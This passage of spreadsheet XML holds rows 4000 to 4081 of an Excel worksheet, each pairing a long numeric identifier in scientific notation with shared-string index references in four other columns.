        <v>9998</v>
      </c>
      <c r="E4000" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="4001" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4001">
        <v>1.23467369389837E+18</v>
      </c>
      <c r="B4001" t="s">
        <v>9999</v>
      </c>
      <c r="C4001" t="s">
        <v>1</v>
      </c>
      <c r="D4001" t="s">
        <v>4037</v>
      </c>
      <c r="E4001" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="4002" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4002">
        <v>1.23467369018641E+18</v>
      </c>
      <c r="B4002" t="s">
        <v>10000</v>
      </c>
      <c r="C4002" t="s">
        <v>1</v>
      </c>
      <c r="D4002" t="s">
        <v>10001</v>
      </c>
      <c r="E4002" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="4003" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4003">
        <v>1.2346736877369001E+18</v>
      </c>
      <c r="B4003" t="s">
        <v>10002</v>
      </c>
      <c r="C4003" t="s">
        <v>1</v>
      </c>
      <c r="D4003" t="s">
        <v>4040</v>
      </c>
      <c r="E4003" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="4004" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4004">
        <v>1.23467368586623E+18</v>
      </c>
      <c r="B4004" t="s">
        <v>10002</v>
      </c>
      <c r="C4004" t="s">
        <v>1</v>
      </c>
      <c r="D4004" t="s">
        <v>10003</v>
      </c>
      <c r="E4004" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="4005" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4005">
        <v>1.23467368428082E+18</v>
      </c>
      <c r="B4005" t="s">
        <v>10002</v>
      </c>
      <c r="C4005" t="s">
        <v>1</v>
      </c>
      <c r="D4005" t="s">
        <v>4042</v>
      </c>
      <c r="E4005" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="4006" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4006">
        <v>1.2346736802585101E+18</v>
      </c>
      <c r="B4006" t="s">
        <v>10004</v>
      </c>
      <c r="C4006" t="s">
        <v>1</v>
      </c>
      <c r="D4006" t="s">
        <v>10005</v>
      </c>
      <c r="E4006" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="4007" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4007">
        <v>1.23467367842976E+18</v>
      </c>
      <c r="B4007" t="s">
        <v>10006</v>
      </c>
      <c r="C4007" t="s">
        <v>1</v>
      </c>
      <c r="D4007" t="s">
        <v>10007</v>
      </c>
      <c r="E4007" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="4008" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4008">
        <v>1.2346736767310799E+18</v>
      </c>
      <c r="B4008" t="s">
        <v>10006</v>
      </c>
      <c r="C4008" t="s">
        <v>1</v>
      </c>
      <c r="D4008" t="s">
        <v>10008</v>
      </c>
      <c r="E4008" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="4009" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4009">
        <v>1.23467367472621E+18</v>
      </c>
      <c r="B4009" t="s">
        <v>10009</v>
      </c>
      <c r="C4009" t="s">
        <v>1</v>
      </c>
      <c r="D4009" t="s">
        <v>10010</v>
      </c>
      <c r="E4009" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="4010" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4010">
        <v>1.2346736726458199E+18</v>
      </c>
      <c r="B4010" t="s">
        <v>10009</v>
      </c>
      <c r="C4010" t="s">
        <v>1</v>
      </c>
      <c r="D4010" t="s">
        <v>10011</v>
      </c>
      <c r="E4010" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="4011" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4011">
        <v>1.23467366869059E+18</v>
      </c>
      <c r="B4011" t="s">
        <v>10012</v>
      </c>
      <c r="C4011" t="s">
        <v>1</v>
      </c>
      <c r="D4011" t="s">
        <v>10013</v>
      </c>
      <c r="E4011" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="4012" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4012">
        <v>1.23467366674447E+18</v>
      </c>
      <c r="B4012" t="s">
        <v>10014</v>
      </c>
      <c r="C4012" t="s">
        <v>1</v>
      </c>
      <c r="D4012" t="s">
        <v>10015</v>
      </c>
      <c r="E4012" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="4013" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4013">
        <v>1.2346736650541E+18</v>
      </c>
      <c r="B4013" t="s">
        <v>10014</v>
      </c>
      <c r="C4013" t="s">
        <v>1</v>
      </c>
      <c r="D4013" t="s">
        <v>10016</v>
      </c>
      <c r="E4013" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="4014" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4014">
        <v>1.2346736623487501E+18</v>
      </c>
      <c r="B4014" t="s">
        <v>10017</v>
      </c>
      <c r="C4014" t="s">
        <v>1</v>
      </c>
      <c r="D4014" t="s">
        <v>10018</v>
      </c>
      <c r="E4014" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="4015" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4015">
        <v>1.23467356085505E+18</v>
      </c>
      <c r="B4015" t="s">
        <v>10019</v>
      </c>
      <c r="C4015" t="s">
        <v>1</v>
      </c>
      <c r="D4015" t="s">
        <v>10020</v>
      </c>
      <c r="E4015" t="s">
        <v>8159</v>
      </c>
    </row>
    <row r="4016" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4016">
        <v>1.2346730559488901E+18</v>
      </c>
      <c r="B4016" t="s">
        <v>10021</v>
      </c>
      <c r="C4016" t="s">
        <v>1</v>
      </c>
      <c r="D4016" t="s">
        <v>10022</v>
      </c>
      <c r="E4016" t="s">
        <v>10023</v>
      </c>
    </row>
    <row r="4017" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4017">
        <v>1.2346718410226401E+18</v>
      </c>
      <c r="B4017" t="s">
        <v>10024</v>
      </c>
      <c r="C4017" t="s">
        <v>1</v>
      </c>
      <c r="D4017" t="s">
        <v>10025</v>
      </c>
      <c r="E4017" t="s">
        <v>2105</v>
      </c>
    </row>
    <row r="4018" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4018">
        <v>1.2346702432361001E+18</v>
      </c>
      <c r="B4018" t="s">
        <v>10026</v>
      </c>
      <c r="C4018" t="s">
        <v>1</v>
      </c>
      <c r="D4018" t="s">
        <v>10027</v>
      </c>
      <c r="E4018" t="s">
        <v>2096</v>
      </c>
    </row>
    <row r="4019" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4019">
        <v>1.2346695675882199E+18</v>
      </c>
      <c r="B4019" t="s">
        <v>10028</v>
      </c>
      <c r="C4019" t="s">
        <v>1</v>
      </c>
      <c r="D4019" t="s">
        <v>10029</v>
      </c>
      <c r="E4019" t="s">
        <v>10030</v>
      </c>
    </row>
    <row r="4020" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4020">
        <v>1.2346682616035899E+18</v>
      </c>
      <c r="B4020" t="s">
        <v>10031</v>
      </c>
      <c r="C4020" t="s">
        <v>1</v>
      </c>
      <c r="D4020" t="s">
        <v>10032</v>
      </c>
      <c r="E4020" t="s">
        <v>10033</v>
      </c>
    </row>
    <row r="4021" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4021">
        <v>1.2346678692390001E+18</v>
      </c>
      <c r="B4021" t="s">
        <v>10034</v>
      </c>
      <c r="C4021" t="s">
        <v>1</v>
      </c>
      <c r="D4021" t="s">
        <v>10035</v>
      </c>
      <c r="E4021" t="s">
        <v>6826</v>
      </c>
    </row>
    <row r="4022" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4022">
        <v>1.2346674157382999E+18</v>
      </c>
      <c r="B4022" t="s">
        <v>10036</v>
      </c>
      <c r="C4022" t="s">
        <v>1</v>
      </c>
      <c r="D4022" t="s">
        <v>10037</v>
      </c>
      <c r="E4022" t="s">
        <v>10038</v>
      </c>
    </row>
    <row r="4023" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4023">
        <v>1.2346669112977201E+18</v>
      </c>
      <c r="B4023" t="s">
        <v>10039</v>
      </c>
      <c r="C4023" t="s">
        <v>1</v>
      </c>
      <c r="D4023" t="s">
        <v>10040</v>
      </c>
      <c r="E4023" t="s">
        <v>4080</v>
      </c>
    </row>
    <row r="4024" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4024">
        <v>1.2346664161727099E+18</v>
      </c>
      <c r="B4024" t="s">
        <v>10041</v>
      </c>
      <c r="C4024" t="s">
        <v>1</v>
      </c>
      <c r="D4024" t="s">
        <v>10042</v>
      </c>
      <c r="E4024" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="4025" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4025">
        <v>1.23466641586237E+18</v>
      </c>
      <c r="B4025" t="s">
        <v>10041</v>
      </c>
      <c r="C4025" t="s">
        <v>1</v>
      </c>
      <c r="D4025" t="s">
        <v>10043</v>
      </c>
      <c r="E4025" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="4026" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4026">
        <v>1.2346664157742799E+18</v>
      </c>
      <c r="B4026" t="s">
        <v>10041</v>
      </c>
      <c r="C4026" t="s">
        <v>1</v>
      </c>
      <c r="D4026" t="s">
        <v>10044</v>
      </c>
      <c r="E4026" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="4027" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4027">
        <v>1.2346664155981299E+18</v>
      </c>
      <c r="B4027" t="s">
        <v>10041</v>
      </c>
      <c r="C4027" t="s">
        <v>1</v>
      </c>
      <c r="D4027" t="s">
        <v>10045</v>
      </c>
      <c r="E4027" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="4028" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4028">
        <v>1.2346664155603799E+18</v>
      </c>
      <c r="B4028" t="s">
        <v>10041</v>
      </c>
      <c r="C4028" t="s">
        <v>1</v>
      </c>
      <c r="D4028" t="s">
        <v>10046</v>
      </c>
      <c r="E4028" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="4029" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4029">
        <v>1.23466641555619E+18</v>
      </c>
      <c r="B4029" t="s">
        <v>10041</v>
      </c>
      <c r="C4029" t="s">
        <v>1</v>
      </c>
      <c r="D4029" t="s">
        <v>10047</v>
      </c>
      <c r="E4029" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="4030" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4030">
        <v>1.23466641406717E+18</v>
      </c>
      <c r="B4030" t="s">
        <v>10048</v>
      </c>
      <c r="C4030" t="s">
        <v>1</v>
      </c>
      <c r="D4030" t="s">
        <v>10049</v>
      </c>
      <c r="E4030" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="4031" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4031">
        <v>1.23466616141488E+18</v>
      </c>
      <c r="B4031" t="s">
        <v>10050</v>
      </c>
      <c r="C4031" t="s">
        <v>1</v>
      </c>
      <c r="D4031" t="s">
        <v>10051</v>
      </c>
      <c r="E4031" t="s">
        <v>4080</v>
      </c>
    </row>
    <row r="4032" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4032">
        <v>1.23466542975213E+18</v>
      </c>
      <c r="B4032" t="s">
        <v>10052</v>
      </c>
      <c r="C4032" t="s">
        <v>1</v>
      </c>
      <c r="D4032" t="s">
        <v>10053</v>
      </c>
      <c r="E4032" t="s">
        <v>10054</v>
      </c>
    </row>
    <row r="4033" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4033">
        <v>1.23466499545713E+18</v>
      </c>
      <c r="B4033" t="s">
        <v>10055</v>
      </c>
      <c r="C4033" t="s">
        <v>1</v>
      </c>
      <c r="D4033" t="s">
        <v>10056</v>
      </c>
      <c r="E4033" t="s">
        <v>10057</v>
      </c>
    </row>
    <row r="4034" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4034">
        <v>1.23466481015277E+18</v>
      </c>
      <c r="B4034" t="s">
        <v>10058</v>
      </c>
      <c r="C4034" t="s">
        <v>1</v>
      </c>
      <c r="D4034" t="s">
        <v>10059</v>
      </c>
      <c r="E4034" t="s">
        <v>10060</v>
      </c>
    </row>
    <row r="4035" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4035">
        <v>1.2346646563644301E+18</v>
      </c>
      <c r="B4035" t="s">
        <v>10061</v>
      </c>
      <c r="C4035" t="s">
        <v>1</v>
      </c>
      <c r="D4035" t="s">
        <v>10062</v>
      </c>
      <c r="E4035" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="4036" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4036">
        <v>1.2346641749212401E+18</v>
      </c>
      <c r="B4036" t="s">
        <v>10063</v>
      </c>
      <c r="C4036" t="s">
        <v>1</v>
      </c>
      <c r="D4036" t="s">
        <v>10064</v>
      </c>
      <c r="E4036" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="4037" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4037">
        <v>1.2346623125873201E+18</v>
      </c>
      <c r="B4037" t="s">
        <v>10065</v>
      </c>
      <c r="C4037" t="s">
        <v>1</v>
      </c>
      <c r="D4037" t="s">
        <v>10066</v>
      </c>
      <c r="E4037" t="s">
        <v>673</v>
      </c>
    </row>
    <row r="4038" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4038">
        <v>1.23466227309375E+18</v>
      </c>
      <c r="B4038" t="s">
        <v>10067</v>
      </c>
      <c r="C4038" t="s">
        <v>1</v>
      </c>
      <c r="D4038" t="s">
        <v>10068</v>
      </c>
      <c r="E4038" t="s">
        <v>4089</v>
      </c>
    </row>
    <row r="4039" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4039">
        <v>1.2346616319314701E+18</v>
      </c>
      <c r="B4039" t="s">
        <v>10069</v>
      </c>
      <c r="C4039" t="s">
        <v>1</v>
      </c>
      <c r="D4039" t="s">
        <v>10070</v>
      </c>
      <c r="E4039" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="4040" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4040">
        <v>1.2346611354181701E+18</v>
      </c>
      <c r="B4040" t="s">
        <v>10071</v>
      </c>
      <c r="C4040" t="s">
        <v>1</v>
      </c>
      <c r="D4040" t="s">
        <v>10072</v>
      </c>
      <c r="E4040" t="s">
        <v>9903</v>
      </c>
    </row>
    <row r="4041" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4041">
        <v>1.23466102209229E+18</v>
      </c>
      <c r="B4041" t="s">
        <v>10073</v>
      </c>
      <c r="C4041" t="s">
        <v>1</v>
      </c>
      <c r="D4041" t="s">
        <v>10074</v>
      </c>
      <c r="E4041" t="s">
        <v>4452</v>
      </c>
    </row>
    <row r="4042" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4042">
        <v>1.23466009273937E+18</v>
      </c>
      <c r="B4042" t="s">
        <v>10075</v>
      </c>
      <c r="C4042" t="s">
        <v>1</v>
      </c>
      <c r="D4042" t="s">
        <v>10076</v>
      </c>
      <c r="E4042" t="s">
        <v>10077</v>
      </c>
    </row>
    <row r="4043" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4043">
        <v>1.2346598619981E+18</v>
      </c>
      <c r="B4043" t="s">
        <v>10078</v>
      </c>
      <c r="C4043" t="s">
        <v>1</v>
      </c>
      <c r="D4043" t="s">
        <v>10079</v>
      </c>
      <c r="E4043" t="s">
        <v>10080</v>
      </c>
    </row>
    <row r="4044" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4044">
        <v>1.2346597747859599E+18</v>
      </c>
      <c r="B4044" t="s">
        <v>10081</v>
      </c>
      <c r="C4044" t="s">
        <v>1</v>
      </c>
      <c r="D4044" t="s">
        <v>10082</v>
      </c>
      <c r="E4044" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="4045" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4045">
        <v>1.23465946527587E+18</v>
      </c>
      <c r="B4045" t="s">
        <v>10083</v>
      </c>
      <c r="C4045" t="s">
        <v>1</v>
      </c>
      <c r="D4045" t="s">
        <v>10084</v>
      </c>
      <c r="E4045" t="s">
        <v>10085</v>
      </c>
    </row>
    <row r="4046" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4046">
        <v>1.2346585004851E+18</v>
      </c>
      <c r="B4046" t="s">
        <v>10086</v>
      </c>
      <c r="C4046" t="s">
        <v>1</v>
      </c>
      <c r="D4046" t="s">
        <v>10087</v>
      </c>
      <c r="E4046" t="s">
        <v>10088</v>
      </c>
    </row>
    <row r="4047" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4047">
        <v>1.23465768547331E+18</v>
      </c>
      <c r="B4047" t="s">
        <v>10089</v>
      </c>
      <c r="C4047" t="s">
        <v>1</v>
      </c>
      <c r="D4047" t="s">
        <v>10090</v>
      </c>
      <c r="E4047" t="s">
        <v>10091</v>
      </c>
    </row>
    <row r="4048" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4048">
        <v>1.2346575510667599E+18</v>
      </c>
      <c r="B4048" t="s">
        <v>10092</v>
      </c>
      <c r="C4048" t="s">
        <v>1</v>
      </c>
      <c r="D4048" t="s">
        <v>10093</v>
      </c>
      <c r="E4048" t="s">
        <v>10094</v>
      </c>
    </row>
    <row r="4049" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4049">
        <v>1.2346571212469499E+18</v>
      </c>
      <c r="B4049" t="s">
        <v>10095</v>
      </c>
      <c r="C4049" t="s">
        <v>1</v>
      </c>
      <c r="D4049" t="s">
        <v>10096</v>
      </c>
      <c r="E4049" t="s">
        <v>7965</v>
      </c>
    </row>
    <row r="4050" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4050">
        <v>1.23465649786433E+18</v>
      </c>
      <c r="B4050" t="s">
        <v>10097</v>
      </c>
      <c r="C4050" t="s">
        <v>1</v>
      </c>
      <c r="D4050" t="s">
        <v>10098</v>
      </c>
      <c r="E4050" t="s">
        <v>2510</v>
      </c>
    </row>
    <row r="4051" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4051">
        <v>1.23465599206498E+18</v>
      </c>
      <c r="B4051" t="s">
        <v>10099</v>
      </c>
      <c r="C4051" t="s">
        <v>1</v>
      </c>
      <c r="D4051" t="s">
        <v>10100</v>
      </c>
      <c r="E4051" t="s">
        <v>1757</v>
      </c>
    </row>
    <row r="4052" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4052">
        <v>1.23465545207329E+18</v>
      </c>
      <c r="B4052" t="s">
        <v>10101</v>
      </c>
      <c r="C4052" t="s">
        <v>1</v>
      </c>
      <c r="D4052" t="s">
        <v>10102</v>
      </c>
      <c r="E4052" t="s">
        <v>7965</v>
      </c>
    </row>
    <row r="4053" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4053">
        <v>1.23465387454959E+18</v>
      </c>
      <c r="B4053" t="s">
        <v>10103</v>
      </c>
      <c r="C4053" t="s">
        <v>1</v>
      </c>
      <c r="D4053" t="s">
        <v>10104</v>
      </c>
      <c r="E4053" t="s">
        <v>6601</v>
      </c>
    </row>
    <row r="4054" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4054">
        <v>1.23465348328815E+18</v>
      </c>
      <c r="B4054" t="s">
        <v>10105</v>
      </c>
      <c r="C4054" t="s">
        <v>1</v>
      </c>
      <c r="D4054" t="s">
        <v>10106</v>
      </c>
      <c r="E4054" t="s">
        <v>918</v>
      </c>
    </row>
    <row r="4055" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4055">
        <v>1.2346534657308001E+18</v>
      </c>
      <c r="B4055" t="s">
        <v>10107</v>
      </c>
      <c r="C4055" t="s">
        <v>1</v>
      </c>
      <c r="D4055" t="s">
        <v>10108</v>
      </c>
      <c r="E4055" t="s">
        <v>10109</v>
      </c>
    </row>
    <row r="4056" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4056">
        <v>1.23465336500883E+18</v>
      </c>
      <c r="B4056" t="s">
        <v>10110</v>
      </c>
      <c r="C4056" t="s">
        <v>1</v>
      </c>
      <c r="D4056" t="s">
        <v>10111</v>
      </c>
      <c r="E4056" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="4057" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4057">
        <v>1.23465269877713E+18</v>
      </c>
      <c r="B4057" t="s">
        <v>10112</v>
      </c>
      <c r="C4057" t="s">
        <v>1</v>
      </c>
      <c r="D4057" t="s">
        <v>10113</v>
      </c>
      <c r="E4057" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="4058" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4058">
        <v>1.2346522495714401E+18</v>
      </c>
      <c r="B4058" t="s">
        <v>10114</v>
      </c>
      <c r="C4058" t="s">
        <v>1</v>
      </c>
      <c r="D4058" t="s">
        <v>10115</v>
      </c>
      <c r="E4058" t="s">
        <v>9892</v>
      </c>
    </row>
    <row r="4059" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4059">
        <v>1.23465190846544E+18</v>
      </c>
      <c r="B4059" t="s">
        <v>10116</v>
      </c>
      <c r="C4059" t="s">
        <v>1</v>
      </c>
      <c r="D4059" t="s">
        <v>10117</v>
      </c>
      <c r="E4059" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="4060" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4060">
        <v>1.2346518288282099E+18</v>
      </c>
      <c r="B4060" t="s">
        <v>10118</v>
      </c>
      <c r="C4060" t="s">
        <v>1</v>
      </c>
      <c r="D4060" t="s">
        <v>10119</v>
      </c>
      <c r="E4060" t="s">
        <v>938</v>
      </c>
    </row>
    <row r="4061" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4061">
        <v>1.23465027911677E+18</v>
      </c>
      <c r="B4061" t="s">
        <v>10120</v>
      </c>
      <c r="C4061" t="s">
        <v>1</v>
      </c>
      <c r="D4061" t="s">
        <v>10121</v>
      </c>
      <c r="E4061" t="s">
        <v>7039</v>
      </c>
    </row>
    <row r="4062" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4062">
        <v>1.23464957004865E+18</v>
      </c>
      <c r="B4062" t="s">
        <v>10122</v>
      </c>
      <c r="C4062" t="s">
        <v>1</v>
      </c>
      <c r="D4062" t="s">
        <v>10123</v>
      </c>
      <c r="E4062" t="s">
        <v>10124</v>
      </c>
    </row>
    <row r="4063" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4063">
        <v>1.23464894635152E+18</v>
      </c>
      <c r="B4063" t="s">
        <v>10125</v>
      </c>
      <c r="C4063" t="s">
        <v>1</v>
      </c>
      <c r="D4063" t="s">
        <v>10126</v>
      </c>
      <c r="E4063" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="4064" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4064">
        <v>1.2346486246943501E+18</v>
      </c>
      <c r="B4064" t="s">
        <v>10127</v>
      </c>
      <c r="C4064" t="s">
        <v>1</v>
      </c>
      <c r="D4064" t="s">
        <v>10128</v>
      </c>
      <c r="E4064" t="s">
        <v>10129</v>
      </c>
    </row>
    <row r="4065" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4065">
        <v>1.2346484534032399E+18</v>
      </c>
      <c r="B4065" t="s">
        <v>10130</v>
      </c>
      <c r="C4065" t="s">
        <v>1</v>
      </c>
      <c r="D4065" t="s">
        <v>10131</v>
      </c>
      <c r="E4065" t="s">
        <v>9892</v>
      </c>
    </row>
    <row r="4066" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4066">
        <v>1.2346477397424499E+18</v>
      </c>
      <c r="B4066" t="s">
        <v>10132</v>
      </c>
      <c r="C4066" t="s">
        <v>1</v>
      </c>
      <c r="D4066" t="s">
        <v>10133</v>
      </c>
      <c r="E4066" t="s">
        <v>10134</v>
      </c>
    </row>
    <row r="4067" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4067">
        <v>1.2346474989181E+18</v>
      </c>
      <c r="B4067" t="s">
        <v>10135</v>
      </c>
      <c r="C4067" t="s">
        <v>1</v>
      </c>
      <c r="D4067" t="s">
        <v>10136</v>
      </c>
      <c r="E4067" t="s">
        <v>10137</v>
      </c>
    </row>
    <row r="4068" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4068">
        <v>1.23464741735155E+18</v>
      </c>
      <c r="B4068" t="s">
        <v>10138</v>
      </c>
      <c r="C4068" t="s">
        <v>1</v>
      </c>
      <c r="D4068" t="s">
        <v>10139</v>
      </c>
      <c r="E4068" t="s">
        <v>10140</v>
      </c>
    </row>
    <row r="4069" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4069">
        <v>1.2346473636098601E+18</v>
      </c>
      <c r="B4069" t="s">
        <v>10141</v>
      </c>
      <c r="C4069" t="s">
        <v>1</v>
      </c>
      <c r="D4069" t="s">
        <v>10142</v>
      </c>
      <c r="E4069" t="s">
        <v>10143</v>
      </c>
    </row>
    <row r="4070" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4070">
        <v>1.2346473240533801E+18</v>
      </c>
      <c r="B4070" t="s">
        <v>10144</v>
      </c>
      <c r="C4070" t="s">
        <v>1</v>
      </c>
      <c r="D4070" t="s">
        <v>10145</v>
      </c>
      <c r="E4070" t="s">
        <v>7085</v>
      </c>
    </row>
    <row r="4071" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4071">
        <v>1.23464721113853E+18</v>
      </c>
      <c r="B4071" t="s">
        <v>10146</v>
      </c>
      <c r="C4071" t="s">
        <v>1</v>
      </c>
      <c r="D4071" t="s">
        <v>10147</v>
      </c>
      <c r="E4071" t="s">
        <v>7093</v>
      </c>
    </row>
    <row r="4072" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4072">
        <v>1.23464675902611E+18</v>
      </c>
      <c r="B4072" t="s">
        <v>10148</v>
      </c>
      <c r="C4072" t="s">
        <v>1</v>
      </c>
      <c r="D4072" t="s">
        <v>10149</v>
      </c>
      <c r="E4072" t="s">
        <v>10150</v>
      </c>
    </row>
    <row r="4073" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4073">
        <v>1.2346467263357499E+18</v>
      </c>
      <c r="B4073" t="s">
        <v>10151</v>
      </c>
      <c r="C4073" t="s">
        <v>1</v>
      </c>
      <c r="D4073" t="s">
        <v>10152</v>
      </c>
      <c r="E4073" t="s">
        <v>7826</v>
      </c>
    </row>
    <row r="4074" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4074">
        <v>1.23464672269074E+18</v>
      </c>
      <c r="B4074" t="s">
        <v>10153</v>
      </c>
      <c r="C4074" t="s">
        <v>1</v>
      </c>
      <c r="D4074" t="s">
        <v>10154</v>
      </c>
      <c r="E4074" t="s">
        <v>10155</v>
      </c>
    </row>
    <row r="4075" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4075">
        <v>1.2346466797412201E+18</v>
      </c>
      <c r="B4075" t="s">
        <v>10156</v>
      </c>
      <c r="C4075" t="s">
        <v>1</v>
      </c>
      <c r="D4075" t="s">
        <v>10157</v>
      </c>
      <c r="E4075" t="s">
        <v>956</v>
      </c>
    </row>
    <row r="4076" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4076">
        <v>1.2346465969289101E+18</v>
      </c>
      <c r="B4076" t="s">
        <v>10158</v>
      </c>
      <c r="C4076" t="s">
        <v>1</v>
      </c>
      <c r="D4076" t="s">
        <v>10159</v>
      </c>
      <c r="E4076" t="s">
        <v>10160</v>
      </c>
    </row>
    <row r="4077" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4077">
        <v>1.2346465182269199E+18</v>
      </c>
      <c r="B4077" t="s">
        <v>10161</v>
      </c>
      <c r="C4077" t="s">
        <v>1</v>
      </c>
      <c r="D4077" t="s">
        <v>10162</v>
      </c>
      <c r="E4077" t="s">
        <v>4693</v>
      </c>
    </row>
    <row r="4078" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4078">
        <v>1.2346463932325299E+18</v>
      </c>
      <c r="B4078" t="s">
        <v>10163</v>
      </c>
      <c r="C4078" t="s">
        <v>1</v>
      </c>
      <c r="D4078" t="s">
        <v>10164</v>
      </c>
      <c r="E4078" t="s">
        <v>7455</v>
      </c>
    </row>
    <row r="4079" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4079">
        <v>1.2346462622989399E+18</v>
      </c>
      <c r="B4079" t="s">
        <v>10165</v>
      </c>
      <c r="C4079" t="s">
        <v>1</v>
      </c>
      <c r="D4079" t="s">
        <v>10166</v>
      </c>
      <c r="E4079" t="s">
        <v>10167</v>
      </c>
    </row>
    <row r="4080" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4080">
        <v>1.23464618641135E+18</v>
      </c>
      <c r="B4080" t="s">
        <v>10168</v>
      </c>
      <c r="C4080" t="s">
        <v>1</v>
      </c>
      <c r="D4080" t="s">
        <v>10169</v>
      </c>
      <c r="E4080" t="s">
        <v>10170</v>
      </c>
    </row>
    <row r="4081" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4081">
        <v>1.23464534197635E+18</v>
      </c>
      <c r="B4081" t="s">
        <v>10171</v>
      </c>
      <c r="C4081" t="s">
        <v>1</v>
      </c>
      <c r="D4081" t="s">
        <v>10172</v>
      </c>
      <c r="E4081" t="s">
        <v>10173</v>
      </c>
    </row>
    <row r="4082" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4082">
